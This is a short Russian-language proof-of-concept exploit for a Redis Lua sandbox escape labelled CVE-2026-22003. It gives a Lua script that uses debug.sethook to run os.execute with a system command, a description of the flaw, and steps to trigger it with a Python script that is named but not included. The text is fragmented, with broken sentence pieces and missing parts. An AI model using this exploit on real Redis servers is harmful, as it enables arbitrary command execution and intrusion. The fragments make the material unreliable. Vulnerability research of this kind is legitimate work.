
PoC-эксплойт для CVE-2026-22003, демонстрирующий побег из песочницы Redis Lua через debug.sethook для выполнения произвольных системных команд.
debug.sethook-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
Песочница Lua в Redis некорректно отключает функцию debug.sethook. Злоумышленник, который может выполнять Lua-скрипты, способен установить хук, выполняющийся в привилегированном контексте, и выйти из песочницы для выполнения произвольных системных команд.
os.execute или подобные функции.EVAL).pip install redis
python trigger_redis_sandbox_escape.py
Создаётся файл /tmp/redis_escape, что доказывает выполнение команд.